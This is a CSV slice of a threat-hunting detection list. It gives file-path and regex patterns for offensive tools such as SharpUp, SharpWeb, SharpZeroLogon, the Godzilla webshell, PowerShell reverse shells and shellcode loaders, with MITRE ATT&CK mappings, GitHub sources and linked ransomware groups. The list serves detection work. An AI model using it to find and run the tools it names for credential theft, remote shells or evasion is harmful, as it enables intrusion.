"*\SharpUp.pdb*",".{0,1000}\\SharpUp\.pdb.{0,1000}","offensive_tool_keyword","SharpUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18738"
"*\SharpUp.sln*",".{0,1000}SharpUp.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","18739"
"*\SharpUp\*",".{0,1000}\\SharpUp\\.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","18740"
"*\SharpUp-master*",".{0,1000}\\SharpUp\-master.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","18741"
"*\SharpVeeamDecryptor-*",".{0,1000}\\SharpVeeamDecryptor\-.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059 - T1070.004","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","18742"
"*\SharpVeeamDecryptor.*",".{0,1000}\\SharpVeeamDecryptor\..{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","18743"
"*\SharpView.exe*",".{0,1000}\\SharpView\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18744"
"*\SharpView.exe*",".{0,1000}\\SharpView\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18745"
"*\SharpView.exe*",".{0,1000}\\SharpView\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta - APT29","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18746"
"*\SharpView.exe*",".{0,1000}\\SharpView\.exe.{0,1000}","offensive_tool_keyword","SharpView","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18747"
"*\SharpView.pdb*",".{0,1000}\\SharpView\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18748"
"*\SharpView.pdb*",".{0,1000}\\SharpView\.pdb.{0,1000}","offensive_tool_keyword","SharpView","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpView","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","18749"
"*\SharpWeb.dll*",".{0,1000}\\SharpWeb\.dll.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","18750"
"*\SharpWeb.exe*",".{0,1000}\\SharpWeb\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18751"
"*\SharpWeb.exe*",".{0,1000}\\SharpWeb\.exe.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","18752"
"*\SharpWeb.sln*",".{0,1000}\\SharpWeb\.sln.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","N/A","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","18753"
"*\SharpWebScan.exe*",".{0,1000}\\SharpWebScan\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18754"
"*\SharpWebServer.exe*",".{0,1000}\\SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18755"
"*\SharpWebServer.exe*",".{0,1000}\\SharpWebServer\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18756"
"*\SharpWifiGrabber.exe*",".{0,1000}\\SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18757"
"*\SharpWifiGrabber.exe*",".{0,1000}\\SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18758"
"*\SharpWifiGrabber.exe*",".{0,1000}\\SharpWifiGrabber\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18759"
"*\sharpwmi.exe*",".{0,1000}\\sharpwmi\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18760"
"*\SharpWMI.exe*",".{0,1000}\\SharpWMI\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18761"
"*\SharpWMI.exe*",".{0,1000}\\SharpWMI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18762"
"*\SharpWMI.exe*",".{0,1000}\\SharpWMI\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","18763"
"*\SharpWSManWinRM.cs*",".{0,1000}\\SharpWSManWinRM\.cs.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","18764"
"*\SharpWSManWinRM.vbs*",".{0,1000}\\SharpWSManWinRM\.vbs.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","18765"
"*\SharpXDecrypt.exe*",".{0,1000}\\SharpXDecrypt\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18766"
"*\SharPyShell*",".{0,1000}\\SharPyShell.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","18767"
"*\SharpZeroLogon.exe*",".{0,1000}\\SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","18768"
"*\SharpZeroLogon.exe*",".{0,1000}\\SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","18769"
"*\SharpZeroLogon.exe*",".{0,1000}\\SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","18770"
"*\SharpZeroLogon.sln*",".{0,1000}\\SharpZeroLogon\.sln.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","0","N/A","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","18771"
"*\Shell3er.ps1*",".{0,1000}\\Shell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","18772"
"*\Shell3er-main*",".{0,1000}\\Shell3er\-main.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","18773"
"*\Shellcode Execution\CertEnumSystemStore\*",".{0,1000}\\Shellcode\sExecution\\CertEnumSystemStore\\.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","18774"
"*\Shellcode Execution\Enum*",".{0,1000}\\Shellcode\sExecution\\Enum.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","18775"
"*\Shellcode Process Injector.csproj*",".{0,1000}\\Shellcode\sProcess\sInjector\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","18776"
"*\shellcode.hpp*",".{0,1000}\\shellcode\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","18777"
"*\shellcode_callback.exe*",".{0,1000}\\shellcode_callback\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","18778"
"*\shellcode_createproc.xml*",".{0,1000}\\shellcode_createproc\.xml.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","18779"
"*\shellcode_generate.py*",".{0,1000}\\shellcode_generate\.py.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","18780"
"*\shellcode_loader.dll*",".{0,1000}\\shellcode_loader\.dll.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tool","https://github.com/med0x2e/GadgetToJScript","1","0","N/A","N/A","10","10","942","168","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z","18781"
"*\shellcode_samples\*",".{0,1000}\\shellcode_samples\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","18782"
"*\shellcode2vba.py*",".{0,1000}\\shellcode2vba\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","18783"
"*\shellcode2vbafunc.py*",".{0,1000}\\shellcode2vbafunc\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","18784"
"*\shellcode-xor.py*",".{0,1000}\\shellcode\-xor\.py.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","18785"
"*\ShellGen.ps1*",".{0,1000}\\ShellGen\.ps1.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","18786"
"*\ShellGen-main.zip*",".{0,1000}\\ShellGen\-main\.zip.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","18787"
"*\shelljack.c*",".{0,1000}\\shelljack\.c.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/io-tl/Mara/","1","0","N/A","N/A","9","1","53","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z","18791"
"*\ShellPwnsh-main*",".{0,1000}\\ShellPwnsh\-main.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","N/A","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","18792"
"*\shellsilo.py*",".{0,1000}\\shellsilo\.py.{0,1000}","offensive_tool_keyword","shellsilo","cutting-edge tool that translates C syntax into syscall assembly and its corresponding shellcode","T1500 - T1588.002 - T1587.001 - T1546.015","TA0005 - TA0042","N/A","N/A","Resource Development","https://github.com/nixpal/shellsilo","1","0","N/A","N/A","6","2","132","13","2024-11-08T03:16:57Z","2024-03-08T02:04:04Z","18793"
"*\ShellSync-main.zip*",".{0,1000}\\ShellSync\-main\.zip.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","18794"
